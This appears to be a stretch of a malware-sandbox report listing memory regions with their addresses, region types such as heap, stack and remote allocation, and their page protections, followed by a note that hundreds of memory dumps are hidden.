heap
|
page read and write
|
||
227AE000
|
stack
|
page read and write
|
||
24950FD0000
|
trusted library allocation
|
page read and write
|
||
22B4E000
|
stack
|
page read and write
|
||
7D1E000
|
stack
|
page read and write
|
||
6309000
|
trusted library allocation
|
page read and write
|
||
7117000
|
heap
|
page read and write
|
||
5B00000
|
trusted library allocation
|
page read and write
|
||
59BF000
|
trusted library allocation
|
page read and write
|
||
2F82000
|
unclassified section
|
page read and write
|
||
820000
|
unkown
|
page readonly
|
||
5DC000
|
heap
|
page read and write
|
||
22DC000
|
stack
|
page read and write
|
||
250F000
|
stack
|
page read and write
|
||
7D70000
|
trusted library allocation
|
page read and write
|
||
3480000
|
direct allocation
|
page read and write
|
||
7117000
|
heap
|
page read and write
|
||
59B9000
|
trusted library allocation
|
page read and write
|
||
4DE7000
|
heap
|
page read and write
|
||
2440000
|
heap
|
page read and write
|
||
7BBA000
|
heap
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
2494C35A000
|
heap
|
page read and write
|
||
210A1A60000
|
trusted library allocation
|
page read and write
|
||
5A5000
|
unkown
|
page read and write
|
||
7E20000
|
trusted library allocation
|
page read and write
|
||
23EE000
|
unkown
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
C890000
|
direct allocation
|
page execute and read and write
|
||
739E000
|
stack
|
page read and write
|
||
23A0000
|
heap
|
page read and write
|
||
5806000
|
unkown
|
page execute and read and write
|
||
7117000
|
heap
|
page read and write
|
||
230A4000
|
heap
|
page read and write
|
||
7D1000
|
unkown
|
page readonly
|
||
249512A0000
|
remote allocation
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
67C000
|
heap
|
page read and write
|
||
22F0000
|
unkown
|
page readonly
|
||
6C1000
|
heap
|
page read and write
|
||
4CC9000
|
trusted library allocation
|
page read and write
|
||
7210000
|
heap
|
page read and write
|
||
72EE000
|
stack
|
page read and write
|
||
21C9000
|
system
|
page execute and read and write
|
||
4F4000
|
heap
|
page read and write
|
||
7BB4000
|
heap
|
page read and write
|
||
A97000
|
heap
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
210A01E0000
|
heap
|
page read and write
|
||
24950F14000
|
trusted library allocation
|
page read and write
|
||
6F3A000
|
system
|
page read and write
|
||
8E4F000
|
stack
|
page read and write
|
||
278B000
|
heap
|
page read and write
|
||
75E0000
|
heap
|
page read and write
|
||
51D0000
|
direct allocation
|
page read and write
|
||
70CE000
|
heap
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
32A5000
|
unclassified section
|
page read and write
|
||
64DC000
|
system
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
2120000
|
unkown
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
280E000
|
stack
|
page read and write
|
||
249510F5000
|
heap
|
page read and write
|
||
4940000
|
remote allocation
|
page execute and read and write
|
||
4D4E000
|
stack
|
page read and write
|
||
630000
|
heap
|
page read and write
|
||
22A40000
|
direct allocation
|
page read and write
|
||
2464000
|
heap
|
page read and write
|
||
6C0000
|
heap
|
page read and write
|
||
24950F00000
|
trusted library allocation
|
page read and write
|
||
4CA0000
|
trusted library allocation
|
page read and write
|
||
24951055000
|
heap
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
24950E70000
|
trusted library allocation
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
4CC0000
|
trusted library allocation
|
page read and write
|
||
63C2000
|
system
|
page read and write
|
||
2494BA5B000
|
heap
|
page read and write
|
||
820000
|
unkown
|
page readonly
|
||
6C1000
|
heap
|
page read and write
|
||
1B0000
|
unkown
|
page readonly
|
||
7E0000
|
unkown
|
page read and write
|
||
210A1E21000
|
trusted library allocation
|
page read and write
|
||
249512A0000
|
remote allocation
|
page read and write
|
||
2494BA00000
|
heap
|
page read and write
|
||
2D30000
|
heap
|
page read and write
|
||
5D6000
|
heap
|
page read and write
|
||
4CDA000
|
trusted library allocation
|
page execute and read and write
|
||
6C1000
|
heap
|
page read and write
|
||
7C4000
|
unkown
|
page readonly
|
||
22C5F000
|
stack
|
page read and write
|
||
334D000
|
heap
|
page read and write
|
||
6D0000
|
heap
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
34C0000
|
heap
|
page read and write
|
||
746EDFA000
|
stack
|
page read and write
|
||
210A02AF000
|
heap
|
page read and write
|
||
2494BA2B000
|
heap
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
7EF000
|
heap
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
7F1000
|
unkown
|
page readonly
|
||
4CBD000
|
trusted library allocation
|
page execute and read and write
|
||
59E000
|
unkown
|
page readonly
|
||
22E00000
|
direct allocation
|
page read and write
|
||
5CB000
|
heap
|
page read and write
|
||
746DEFE000
|
unkown
|
page readonly
|
||
7D5D000
|
stack
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
840000
|
heap
|
page read and write
|
||
22BE0000
|
remote allocation
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
6740000
|
remote allocation
|
page execute and read and write
|
||
634000
|
heap
|
page read and write
|
||
2276D000
|
stack
|
page read and write
|
||
2495124D000
|
trusted library allocation
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
230A0000
|
heap
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
7119000
|
heap
|
page read and write
|
||
3328000
|
heap
|
page read and write
|
||
5A5000
|
unkown
|
page read and write
|
||
7530000
|
heap
|
page read and write
|
||
73A0000
|
direct allocation
|
page read and write
|
||
65C000
|
heap
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
233D000
|
stack
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
210A1C00000
|
heap
|
page read and write
|
||
666000
|
heap
|
page read and write
|
||
249512E5000
|
trusted library allocation
|
page read and write
|
||
2A8F000
|
stack
|
page read and write
|
||
2494BAA2000
|
heap
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
24951307000
|
trusted library allocation
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
ACBDFFE000
|
stack
|
page read and write
|
||
3450000
|
direct allocation
|
page read and write
|
||
5C0000
|
heap
|
page read and write
|
||
2494C200000
|
heap
|
page read and write
|
||
649000
|
unkown
|
page execute read
|
||
A090000
|
direct allocation
|
page execute and read and write
|
||
6C1000
|
heap
|
page read and write
|
||
210A1D00000
|
trusted library allocation
|
page read and write
|
||
8EA0000
|
direct allocation
|
page execute and read and write
|
||
24950F40000
|
trusted library allocation
|
page read and write
|
||
70D0000
|
heap
|
page read and write
|
||
74B0000
|
heap
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
22CBC000
|
stack
|
page read and write
|
||
22DBC000
|
stack
|
page read and write
|
||
2494C1A0000
|
trusted library section
|
page readonly
|
||
7380000
|
direct allocation
|
page read and write
|
||
746EC7E000
|
stack
|
page read and write
|
||
73C0000
|
direct allocation
|
page read and write
|
||
7AE4000
|
heap
|
page read and write
|
||
2494BA8E000
|
heap
|
page read and write
|
||
2915000
|
heap
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
6C1000
|
heap
|
page read and write
|
||
210A1F01000
|
trusted library allocation
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
3644000
|
unclassified section
|
page read and write
|
||
71000
|
heap
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
2F5C000
|
stack
|
page read and write
|
||
2494C1D0000
|
trusted library section
|
page readonly
|
||
8990000
|
trusted library allocation
|
page read and write
|
||
7BDD000
|
heap
|
page read and write
|
||
7DC0000
|
trusted library allocation
|
page read and write
|
||
3C8C000
|
unclassified section
|
page read and write
|
||
2F72000
|
direct allocation
|
page execute and read and write
|
||
7880000
|
heap
|
page read and write
|
||
63A000
|
heap
|
page read and write
|
||
24951050000
|
heap
|
page read and write
|
||
8830000
|
trusted library allocation
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
21D000
|
stack
|
page read and write
|
||
5D0000
|
heap
|
page read and write
|
||
2600000
|
heap
|
page read and write
|
||
5E6000
|
unkown
|
page execute read
|
||
2F9D000
|
stack
|
page read and write
|
||
2494BA7A000
|
heap
|
page read and write
|
||
66E5000
|
system
|
page read and write
|
||
22AFF000
|
stack
|
page read and write
|
||
840000
|
trusted library allocation
|
page read and write
|
||
24951230000
|
trusted library allocation
|
page read and write
|
||
239D000
|
stack
|
page read and write
|
||
7340000
|
direct allocation
|
page read and write
|
||
804000
|
unkown
|
page readonly
|
||
2494C31B000
|
heap
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
24950F30000
|
trusted library allocation
|
page read and write
|
||
7E6C000
|
stack
|
page read and write
|
||
4D98000
|
unkown
|
page execute and read and write
|
||
6C1000
|
heap
|
page read and write
|
||
73D0000
|
direct allocation
|
page read and write
|
||
591000
|
unkown
|
page execute read
|
||
698000
|
heap
|
page read and write
|
||
51B0000
|
trusted library allocation
|
page read and write
|
||
408000
|
unkown
|
page readonly
|
||
3470000
|
direct allocation
|
page read and write
|
||
23F0000
|
heap
|
page read and write
|
||
23E0000
|
heap
|
page read and write
|
||
70B5000
|
heap
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
7526000
|
heap
|
page read and write
|
||
7040000
|
heap
|
page read and write
|
||
746DBFE000
|
stack
|
page read and write
|
||
725E000
|
system
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
7225000
|
heap
|
page read and write
|
||
2AEF000
|
unkown
|
page read and write
|
||
626000
|
heap
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
24951097000
|
heap
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
870000
|
heap
|
page read and write
|
||
22EEC000
|
heap
|
page read and write
|
||
66A000
|
heap
|
page read and write
|
||
66F000
|
heap
|
page read and write
|
||
2DE0000
|
unkown
|
page execute and read and write
|
||
249510CD000
|
heap
|
page read and write
|
||
24950FD0000
|
trusted library allocation
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
2B1E000
|
stack
|
page read and write
|
||
7048000
|
heap
|
page read and write
|
||
62E1000
|
trusted library allocation
|
page read and write
|
||
8EB0000
|
trusted library allocation
|
page execute and read and write
|
||
6CC000
|
heap
|
page read and write
|
||
8C62000
|
heap
|
page read and write
|
||
2220000
|
system
|
page execute and read and write
|
||
7F1000
|
unkown
|
page readonly
|
||
6C1000
|
heap
|
page read and write
|
||
2A7F000
|
stack
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
8900000
|
trusted library allocation
|
page execute and read and write
|
||
210A1E0E000
|
trusted library allocation
|
page read and write
|
||
73DE000
|
stack
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
24951210000
|
trusted library allocation
|
page read and write
|
||
70B5000
|
heap
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
2494BB13000
|
heap
|
page read and write
|
||
8C70000
|
heap
|
page read and write
|
||
7D1000
|
unkown
|
page readonly
|
||
7470000
|
heap
|
page read and write
|
||
2AD0000
|
heap
|
page read and write
|
||
2495110E000
|
heap
|
page read and write
|
||
2D59000
|
direct allocation
|
page execute and read and write
|
||
24950F12000
|
trusted library allocation
|
page read and write
|
||
7B3E000
|
heap
|
page read and write
|
||
7C20000
|
trusted library allocation
|
page read and write
|
||
615000
|
heap
|
page read and write
|
||
746E4FE000
|
unkown
|
page readonly
|
||
210A002F000
|
system
|
page execute and read and write
|
||
6C1000
|
heap
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
8F7000
|
heap
|
page read and write
|
||
24950F11000
|
trusted library allocation
|
page read and write
|
||
1A0000
|
unkown
|
page readonly
|
||
666000
|
heap
|
page read and write
|
||
249512C2000
|
trusted library allocation
|
page read and write
|
||
22E00000
|
direct allocation
|
page read and write
|
||
408000
|
unkown
|
page readonly
|
||
940000
|
unkown
|
page readonly
|
||
634000
|
heap
|
page read and write
|
||
89A0000
|
trusted library allocation
|
page execute and read and write
|
||
6C1000
|
heap
|
page read and write
|
||
24950EB0000
|
trusted library allocation
|
page read and write
|
||
746D67B000
|
stack
|
page read and write
|
||
249512FF000
|
trusted library allocation
|
page read and write
|
||
746E9FE000
|
unkown
|
page readonly
|
||
6C1000
|
heap
|
page read and write
|
||
24951291000
|
trusted library allocation
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
8EC0000
|
trusted library allocation
|
page read and write
|
||
249512BA000
|
trusted library allocation
|
page read and write
|
||
7030000
|
heap
|
page read and write
|
||
746F4FE000
|
unkown
|
page readonly
|
||
7390000
|
direct allocation
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
24952000000
|
heap
|
page read and write
|
||
22B8F000
|
stack
|
page read and write
|
||
2494B990000
|
trusted library section
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
24951208000
|
trusted library allocation
|
page read and write
|
||
24951113000
|
heap
|
page read and write
|
||
2912000
|
heap
|
page read and write
|
||
59E000
|
unkown
|
page readonly
|
||
782F000
|
stack
|
page read and write
|
||
66F000
|
heap
|
page read and write
|
||
669C000
|
system
|
page read and write
|
||
3210000
|
heap
|
page read and write
|
||
2450000
|
heap
|
page read and write
|
||
88FF000
|
stack
|
page read and write
|
||
8D4E000
|
stack
|
page read and write
|
||
753D000
|
heap
|
page read and write
|
||
2494BA28000
|
heap
|
page read and write
|
||
24950EE0000
|
trusted library allocation
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
70DC000
|
heap
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
2494C840000
|
trusted library allocation
|
page read and write
|
||
7AC0000
|
trusted library allocation
|
page read and write
|
||
7435000
|
heap
|
page execute and read and write
|
||
7AFD000
|
heap
|
page read and write
|
||
2494BAFF000
|
heap
|
page read and write
|
||
2495126C000
|
trusted library allocation
|
page read and write
|
||
5D7000
|
heap
|
page read and write
|
||
20F0000
|
unkown
|
page read and write
|
||
590000
|
unkown
|
page readonly
|
||
693000
|
heap
|
page read and write
|
||
2495110A000
|
heap
|
page read and write
|
||
2CD0000
|
heap
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
2494CE70000
|
trusted library allocation
|
page read and write
|
||
24951113000
|
heap
|
page read and write
|
||
2560000
|
heap
|
page read and write
|
||
2494CA20000
|
trusted library allocation
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
325C000
|
unclassified section
|
page read and write
|
||
2CA0000
|
heap
|
page read and write
|
||
408000
|
unkown
|
page readonly
|
||
8C4000
|
heap
|
page read and write
|
||
6206000
|
unkown
|
page execute and read and write
|
||
7B97000
|
heap
|
page read and write
|
||
20644000
|
system
|
page read and write
|
||
5EE000
|
unkown
|
page execute read
|
||
2C30000
|
direct allocation
|
page execute and read and write
|
||
7D1000
|
unkown
|
page readonly
|
||
2120000
|
unkown
|
page read and write
|
||
840000
|
trusted library allocation
|
page read and write
|
||
6488000
|
trusted library allocation
|
page read and write
|
||
3300000
|
heap
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
70D7000
|
heap
|
page read and write
|
||
4CB0000
|
trusted library allocation
|
page read and write
|
||
746DCFE000
|
unkown
|
page readonly
|
||
6C1000
|
heap
|
page read and write
|
||
746DDFB000
|
stack
|
page read and write
|
||
7360000
|
direct allocation
|
page read and write
|
||
8F8F000
|
stack
|
page read and write
|
||
7C9E000
|
stack
|
page read and write
|
||
9367000
|
trusted library allocation
|
page read and write
|
||
580000
|
heap
|
page read and write
|
||
746EAFE000
|
unkown
|
page readonly
|
||
2494B940000
|
heap
|
page read and write
|
||
3540000
|
remote allocation
|
page execute and read and write
|
||
73F0000
|
direct allocation
|
page read and write
|
||
2BEF000
|
stack
|
page read and write
|
||
746EEFE000
|
unkown
|
page readonly
|
||
CD1000
|
unkown
|
page readonly
|
||
95B0000
|
direct allocation
|
page execute and read and write
|
||
22E4000
|
heap
|
page read and write
|
||
210A028A000
|
heap
|
page read and write
|
||
340E000
|
stack
|
page read and write
|
||
2025C000
|
system
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
6CE000
|
stack
|
page read and write
|
||
804000
|
unkown
|
page readonly
|
||
940000
|
unkown
|
page readonly
|
||
85E000
|
stack
|
page read and write
|
||
570000
|
unkown
|
page readonly
|
||
746D9F7000
|
stack
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
2494C202000
|
heap
|
page read and write
|
||
24950F30000
|
trusted library allocation
|
page read and write
|
||
24DE000
|
stack
|
page read and write
|
||
202A5000
|
system
|
page read and write
|
||
8AF000
|
heap
|
page read and write
|
||
243D000
|
stack
|
page read and write
|
||
24951043000
|
heap
|
page read and write
|
||
7520000
|
heap
|
page read and write
|
||
270E000
|
unkown
|
page read and write
|
||
7123000
|
heap
|
page read and write
|
||
550000
|
unkown
|
page readonly
|
||
8820000
|
trusted library allocation
|
page read and write
|
||
8C65000
|
heap
|
page read and write
|
||
70BC000
|
heap
|
page read and write
|
||
804000
|
unkown
|
page readonly
|
||
226ED000
|
stack
|
page read and write
|
||
5CB000
|
heap
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
647000
|
heap
|
page read and write
|
||
DC90000
|
direct allocation
|
page execute and read and write
|
||
7DA0000
|
trusted library allocation
|
page read and write
|
||
7E00000
|
trusted library allocation
|
page read and write
|
||
2495131A000
|
trusted library allocation
|
page read and write
|
||
19A000
|
stack
|
page read and write
|
||
980000
|
trusted library allocation
|
page read and write
|
||
51F0000
|
direct allocation
|
page read and write
|
||
4F0000
|
heap
|
page read and write
|
||
70DC000
|
heap
|
page read and write
|
||
210A1A60000
|
trusted library allocation
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
23F0000
|
heap
|
page read and write
|
||
7B47000
|
heap
|
page read and write
|
||
2C1F000
|
stack
|
page read and write
|
||
2494BAA0000
|
heap
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
309C000
|
unclassified section
|
page read and write
|
||
2495120E000
|
trusted library allocation
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
A4E000
|
stack
|
page read and write
|
||
1E0000
|
heap
|
page read and write
|
||
40C000
|
unkown
|
page read and write
|
||
3240000
|
heap
|
page read and write
|
||
A68000
|
heap
|
page read and write
|
||
BFD000
|
stack
|
page read and write
|
||
2494CE41000
|
trusted library allocation
|
page read and write
|
||
7E0000
|
unkown
|
page read and write
|
||
210A00C0000
|
heap
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
2494C1B0000
|
trusted library section
|
page readonly
|
||
21A4000
|
system
|
page execute and read and write
|
||
6C1000
|
heap
|
page read and write
|
||
52CE000
|
stack
|
page read and write
|
||
4CD0000
|
trusted library allocation
|
page read and write
|
||
7C00000
|
trusted library allocation
|
page read and write
|
||
683000
|
heap
|
page read and write
|
||
86E000
|
heap
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
A60000
|
heap
|
page read and write
|
||
2494BA7D000
|
heap
|
page read and write
|
||
23470000
|
unclassified section
|
page execute and read and write
|
||
24950F00000
|
trusted library allocation
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
249512FC000
|
trusted library allocation
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
70B7000
|
heap
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
7B15000
|
heap
|
page read and write
|
||
B3E000
|
stack
|
page read and write
|
||
24951264000
|
trusted library allocation
|
page read and write
|
||
7228000
|
heap
|
page read and write
|
||
70000
|
heap
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
249512E8000
|
trusted library allocation
|
page read and write
|
||
2494BA95000
|
heap
|
page read and write
|
||
70A6000
|
heap
|
page read and write
|
||
591000
|
unkown
|
page execute read
|
||
7535000
|
heap
|
page read and write
|
||
1660000
|
remote allocation
|
page execute and read and write
|
||
2445000
|
heap
|
page read and write
|
||
5CD000
|
heap
|
page read and write
|
||
7085000
|
heap
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
233ED000
|
direct allocation
|
page execute and read and write
|
||
5340000
|
remote allocation
|
page execute and read and write
|
||
786000
|
unkown
|
page read and write
|
||
5DC000
|
heap
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
66A000
|
heap
|
page read and write
|
||
22C1E000
|
stack
|
page read and write
|
||
69D000
|
heap
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
866000
|
unkown
|
page read and write
|
||
24951240000
|
trusted library allocation
|
page read and write
|
||
3440000
|
direct allocation
|
page read and write
|
||
24C0000
|
heap
|
page read and write
|
||
4CE0000
|
trusted library allocation
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
1740000
|
remote allocation
|
page execute and read and write
|
||
746ECFE000
|
unkown
|
page readonly
|
||
7C4000
|
unkown
|
page readonly
|
||
40A000
|
unkown
|
page read and write
|
||
786E000
|
stack
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
22F77000
|
heap
|
page read and write
|
||
277E000
|
stack
|
page read and write
|
||
27A0000
|
heap
|
page read and write
|
||
28FB000
|
heap
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
746DAFE000
|
unkown
|
page readonly
|
||
51E0000
|
direct allocation
|
page read and write
|
||
249E000
|
stack
|
page read and write
|
||
59B7000
|
trusted library allocation
|
page read and write
|
||
23249000
|
direct allocation
|
page execute and read and write
|
||
7C40000
|
trusted library allocation
|
page read and write
|
||
24951062000
|
heap
|
page read and write
|
||
550000
|
unkown
|
page readonly
|
||
7420000
|
direct allocation
|
page read and write
|
||
24951272000
|
trusted library allocation
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
776E000
|
stack
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
3430000
|
direct allocation
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
2494BA90000
|
heap
|
page read and write
|
||
7AC000
|
unkown
|
page read and write
|
||
22E0000
|
heap
|
page read and write
|
||
43A000
|
stack
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
CD1000
|
unkown
|
page readonly
|
||
210A1FCE000
|
trusted library allocation
|
page read and write
|
||
7D80000
|
trusted library allocation
|
page read and write
|
||
8850000
|
heap
|
page read and write
|
||
8C55000
|
heap
|
page read and write
|
||
7B34000
|
heap
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
24951000000
|
heap
|
page read and write
|
||
2150000
|
heap
|
page read and write
|
||
3420000
|
direct allocation
|
page read and write
|
||
8C10000
|
heap
|
page read and write
|
||
70D7000
|
heap
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
41E0000
|
unkown
|
page execute and read and write
|
||
6C1000
|
heap
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
2495126F000
|
trusted library allocation
|
page read and write
|
||
ACBCFFC000
|
stack
|
page read and write
|
||
7400000
|
direct allocation
|
page read and write
|
||
26FD000
|
stack
|
page read and write
|
||
70CE000
|
heap
|
page read and write
|
||
4DE0000
|
heap
|
page read and write
|
||
7EE70000
|
trusted library allocation
|
page execute and read and write
|
||
2494B920000
|
heap
|
page read and write
|
||
657000
|
heap
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
2568000
|
heap
|
page read and write
|
||
590000
|
unkown
|
page readonly
|
||
6C1000
|
heap
|
page read and write
|
||
24951102000
|
heap
|
page read and write
|
||
580000
|
heap
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
626000
|
heap
|
page read and write
|
||
4CB3000
|
trusted library allocation
|
page execute and read and write
|
||
621000
|
heap
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
60C000
|
heap
|
page read and write
|
||
C9F000
|
stack
|
page read and write
|
||
3F40000
|
remote allocation
|
page execute and read and write
|
||
860000
|
heap
|
page read and write
|
||
70D0000
|
heap
|
page read and write
|
||
2495128E000
|
trusted library allocation
|
page read and write
|
||
180000
|
heap
|
page read and write
|
||
28F0000
|
heap
|
page read and write
|
||
560000
|
unkown
|
page readonly
|
||
210A02B1000
|
heap
|
page read and write
|
||
A9D000
|
heap
|
page read and write
|
||
64EF000
|
trusted library allocation
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
AB0000
|
heap
|
page read and write
|
||
A99000
|
heap
|
page read and write
|
||
5E4000
|
unkown
|
page execute read
|
||
2324D000
|
direct allocation
|
page execute and read and write
|
||
6C1000
|
heap
|
page read and write
|
||
3968000
|
unclassified section
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
4D90000
|
heap
|
page readonly
|
||
746E77E000
|
stack
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
2494C300000
|
heap
|
page read and write
|
||
3AFA000
|
unclassified section
|
page read and write
|
||
7410000
|
direct allocation
|
page read and write
|
||
249512F4000
|
trusted library allocation
|
page read and write
|
||
746EBFE000
|
unkown
|
page readonly
|
||
3460000
|
direct allocation
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
7AD0000
|
trusted library allocation
|
page execute and read and write
|
||
560000
|
unkown
|
page readonly
|
||
4CE5000
|
trusted library allocation
|
page execute and read and write
|
||
6C1000
|
heap
|
page read and write
|
||
210A029C000
|
heap
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
2494BB02000
|
heap
|
page read and write
|
||
24951100000
|
heap
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
2494B980000
|
trusted library allocation
|
page read and write
|
||
2494C215000
|
heap
|
page read and write
|
||
7117000
|
heap
|
page read and write
|
||
2730000
|
heap
|
page read and write
|
||
890000
|
heap
|
page read and write
|
||
5200000
|
direct allocation
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
2494BA40000
|
heap
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
2820000
|
heap
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
7A6000
|
unkown
|
page read and write
|
||
6B6000
|
heap
|
page read and write
|
||
800000
|
unkown
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
7992000
|
heap
|
page read and write
|
||
22E4000
|
heap
|
page read and write
|
||
688000
|
heap
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
2494B950000
|
heap
|
page read and write
|
||
6D6000
|
heap
|
page read and write
|
||
2494BAB0000
|
heap
|
page read and write
|
||
2B40000
|
remote allocation
|
page execute and read and write
|
||
7E10000
|
trusted library allocation
|
page read and write
|
||
7370000
|
direct allocation
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
3490000
|
direct allocation
|
page read and write
|
||
2494BAB4000
|
heap
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
7AE0000
|
heap
|
page read and write
|
||
A40000
|
heap
|
page read and write
|
||
875000
|
heap
|
page read and write
|
||
52E1000
|
trusted library allocation
|
page read and write
|
||
840000
|
heap
|
page read and write
|
||
8C3E000
|
heap
|
page read and write
|
||
8E90000
|
trusted library allocation
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
23462000
|
direct allocation
|
page execute and read and write
|
||
210A02AA000
|
heap
|
page read and write
|
||
2494C31A000
|
heap
|
page read and write
|
||
24951250000
|
trusted library allocation
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
630000
|
heap
|
page read and write
|
||
9CB000
|
heap
|
page read and write
|
||
2AB0000
|
heap
|
page read and write
|
||
2780000
|
heap
|
page read and write
|
||
72AE000
|
stack
|
page read and write
|
||
7B2000
|
unkown
|
page read and write
|
||
7BA4000
|
heap
|
page read and write
|
||
53C000
|
stack
|
page read and write
|
||
7117000
|
heap
|
page read and write
|
||
2272D000
|
stack
|
page read and write
|
||
21CB000
|
system
|
page execute and read and write
|
||
782000
|
unkown
|
page read and write
|
||
7123000
|
heap
|
page read and write
|
||
3320000
|
heap
|
page read and write
|
||
23120000
|
direct allocation
|
page execute and read and write
|
||
2494C313000
|
heap
|
page read and write
|
||
6A7000
|
heap
|
page read and write
|
||
70D0000
|
heap
|
page read and write
|
||
7A97000
|
trusted library allocation
|
page read and write
|
||
24A0000
|
heap
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
190000
|
unkown
|
page readonly
|
||
2EFD000
|
direct allocation
|
page execute and read and write
|
||
6C1000
|
heap
|
page read and write
|
||
330C000
|
stack
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
746EB7E000
|
stack
|
page read and write
|
||
249512A0000
|
trusted library allocation
|
page read and write
|
||
4DC0000
|
heap
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
3272000
|
unclassified section
|
page read and write
|
There are 995 hidden memdumps, click here to show them.